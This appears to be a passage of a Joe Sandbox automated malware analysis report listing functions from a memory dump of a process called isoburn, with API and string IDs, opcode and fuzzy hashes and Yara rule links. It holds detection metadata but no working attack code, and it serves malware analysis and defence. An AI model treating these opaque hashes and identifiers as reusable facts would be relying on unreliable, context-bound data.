                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0511728C
                                                                            Strings
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05117294
                                                                            • RTL: Re-Waiting, xrefs: 051172C1
                                                                            • RTL: Resource at %p, xrefs: 051172A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: 11288bfbda4ebdec1e856bd3d6b16e67a99b7bd9d339abe045a4390667bf33b2
                                                                            • Instruction ID: 35772bab0ad6d125b37badcbc26eac20e762b8107ff3520e8dbc1bf2ca7870f9
                                                                            • Opcode Fuzzy Hash: 11288bfbda4ebdec1e856bd3d6b16e67a99b7bd9d339abe045a4390667bf33b2
                                                                            • Instruction Fuzzy Hash: 6A41DE31704212ABCB21DE24DC41FAAB7A6FF44710F210629FD95AB380DB21E8128BE5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05152300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: fd700bb9e1511a3a738ac43ab22ef30be5c35267af4253ff629e21e027511ca1
                                                                            • Instruction ID: 4a687980edc52a19499aaf08369cb3b961bd4a4e8e06e8d18a53f95bb0278bed
                                                                            • Opcode Fuzzy Hash: fd700bb9e1511a3a738ac43ab22ef30be5c35267af4253ff629e21e027511ca1
                                                                            • Instruction Fuzzy Hash: AA318476A00219DFCB64DE28DC44FEF77B8FB44610F544595ED69E3240EB30AA489BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-
                                                                            • API String ID: 1302938615-2137968064
                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction ID: 5b597c0ead498278bb811aca0fcf5cd28b28305ec3336d55a1b5cd3cd8b02828
                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                            • Instruction Fuzzy Hash: B9919270F0429A9FDB68DE69E881ABEB7F6FF44320F34451AE865E72D0E73099418750
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050A9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.4475578362.0000000005070000.00000040.00001000.00020000.00000000.sdmp, Offset: 05070000, based on PE: true
                                                                            • Associated: 00000005.00000002.4475578362.0000000005199000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000519D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000005.00000002.4475578362.000000000520E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_5070000_isoburn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: fef1cd07f23fae9c32c727f60ddcb76216f0315c7b69b8763ae9e5d0d3ff59c8
                                                                            • Instruction ID: a355349c57e893836f704248985d4b0998fe9b99d8e74884cfeaf001414e5686
                                                                            • Opcode Fuzzy Hash: fef1cd07f23fae9c32c727f60ddcb76216f0315c7b69b8763ae9e5d0d3ff59c8
                                                                            • Instruction Fuzzy Hash: 70814E76E002699BDB35CB94DC48BEEB7B4AB08750F0445EAA919B7280D7709E80CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%